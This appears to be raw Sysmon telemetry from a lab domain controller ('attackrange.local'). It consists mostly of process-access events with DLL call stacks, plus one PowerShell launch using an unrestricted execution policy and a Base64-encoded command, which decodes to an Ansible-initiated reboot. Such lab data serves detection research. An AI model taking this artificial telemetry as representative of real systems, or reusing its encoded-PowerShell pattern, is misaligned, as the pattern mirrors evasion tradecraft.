13:52:27.868{10ACEC4A-83B9-5FCF-0C00-000000009001}4801040C:\Windows\system32\svchost.exe{10ACEC4A-83B2-5FCF-0700-000000009001}716C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000550Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:27.852{10ACEC4A-83B9-5FCF-0C00-000000009001}4801040C:\Windows\system32\svchost.exe{10ACEC4A-83B2-5FCF-0700-000000009001}716C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000549Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:27.852{10ACEC4A-83B9-5FCF-0C00-000000009001}4801040C:\Windows\system32\svchost.exe{10ACEC4A-83B2-5FCF-0700-000000009001}716C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000548Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:27.852{10ACEC4A-83B9-5FCF-0C00-000000009001}4801040C:\Windows\system32\svchost.exe{10ACEC4A-83B2-5FCF-0700-000000009001}716C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000547Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:27.852{10ACEC4A-851B-5FCF-D902-000000009001}45203012C:\Windows\system32\conhost.exe{10ACEC4A-851B-5FCF-DF02-000000009001}4544C:\Windows\system32\shutdown.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000546Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:27.852{10ACEC4A-83B9-5FCF-0C00-000000009001}4801040C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000545Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:27.852{10ACEC4A-83B9-5FCF-0C00-000000009001}4801040C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000544Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:27.852{10ACEC4A-83B9-5FCF-0C00-000000009001}4801040C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000543Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:27.852{10ACEC4A-83B9-5FCF-0C00-000000009001}4801040C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000542Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:27.852{10ACEC4A-83B9-5FCF-0C00-000000009001}4801040C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000541Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:27.852{10ACEC4A-83B9-5FCF-0C00-000000009001}4801040C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000540Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:27.852{10ACEC4A-83B9-5FCF-0C00-000000009001}4801040C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000539Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:27.852{10ACEC4A-83B9-5FCF-0C00-000000009001}4801040C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000538Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:27.852{10ACEC4A-83B9-5FCF-0C00-000000009001}4801040C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000537Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:27.852{10ACEC4A-83AA-5FCF-0500-000000009001}640656C:\Windows\system32\csrss.exe{10ACEC4A-851B-5FCF-DF02-000000009001}4544C:\Windows\system32\shutdown.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000536Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:27.852{10ACEC4A-851B-5FCF-DE02-000000009001}43562596C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{10ACEC4A-851B-5FCF-DF02-000000009001}4544C:\Windows\system32\shutdown.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b5560|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b4f07|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+bd96258b(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+bce03195(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+bce02e66(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+bd8b474b(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+bcdc39fc(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+bce21ecb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+bce05530(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+bce05530(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+bce053c1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+bcdf7346(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+bce03879(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+bce0346c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+bce03195(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+bce02e66(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+bd8b474b(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+bcde9cc7(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+bcde9297(wow64) 154100x8000000000000000535Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:27.852{10ACEC4A-851B-5FCF-DF02-000000009001}4544C:\Windows\System32\shutdown.exe10.0.14393.0 (rs1_release.160715-1616)Windows Shutdown and Annotation ToolMicrosoft® Windows® Operating SystemMicrosoft CorporationSHUTDOWN.EXE"C:\Windows\system32\shutdown.exe" /r /t 2 /c "Reboot initiated by Ansible"C:\Users\Administrator\ATTACKRANGE\Administrator{10ACEC4A-851B-5FCF-15E5-100000000000}0x10e5150HighMD5=547993395376742A437D3145AF6B0309,SHA256=F96073C3442EA0A99B4945394007602772DB36732D1511DC2068519526678F8A,IMPHASH=609F1D7580ED496A3076AEBA77DAFC7E{10ACEC4A-851B-5FCF-DE02-000000009001}4356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UwBlAHQALQBTAHQAcgBpAGMAdABNAG8AZABlACAALQBWAGUAcgBzAGkAbwBuACAATABhAHQAZQBzAHQACgBzAGgAdQB0AGQAbwB3AG4AIAAvAHIAIAAvAHQAIAAyACAALwBjACAAIgBSAGUAYgBvAG8AdAAgAGkAbgBpAHQAaQBhAHQAZQBkACAAYgB5ACAAQQBuAHMAaQBiAGwAZQAiAAoASQBmACAAKAAtAG4AbwB0ACAAJAA/ACkAIAB7ACAASQBmACAAKABHAGUAdAAtAFYAYQByAGkAYQBiAGwAZQAgAEwAQQBTAFQARQBYAEkAVABDAE8ARABFACAALQBFAHIAcgBvAHIAQQBjAHQAaQBvAG4AIABTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlACkAIAB7ACAAZQB4AGkAdAAgACQATABBAFMAVABFAFgASQBUAEMATwBEAEUAIAB9ACAARQBsAHMAZQAgAHsAIABlAHgAaQB0ACAAMQAgAH0AIAB9AA== 10341000x8000000000000000534Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:27.790{10ACEC4A-83B6-5FCF-0B00-000000009001}8604064C:\Windows\system32\lsass.exe{10ACEC4A-851B-5FCF-DE02-000000009001}4356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000533Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:27.790{10ACEC4A-83B6-5FCF-0B00-000000009001}8604064C:\Windows\system32\lsass.exe{10ACEC4A-851B-5FCF-DE02-000000009001}4356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x8000000000000000532Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:27.743{10ACEC4A-851B-5FCF-DE02-000000009001}4356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_0uwn3tfg.zy4.ps12020-12-08 13:52:27.743 10341000x8000000000000000531Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:27.743{10ACEC4A-83B9-5FCF-0C00-000000009001}4801040C:\Windows\system32\svchost.exe{10ACEC4A-851B-5FCF-DE02-000000009001}4356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000530Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:27.712{10ACEC4A-851B-5FCF-D902-000000009001}45203012C:\Windows\system32\conhost.exe{10ACEC4A-851B-5FCF-DE02-000000009001}4356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000529Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:27.712{10ACEC4A-83B9-5FCF-0C00-000000009001}4801040C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000528Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 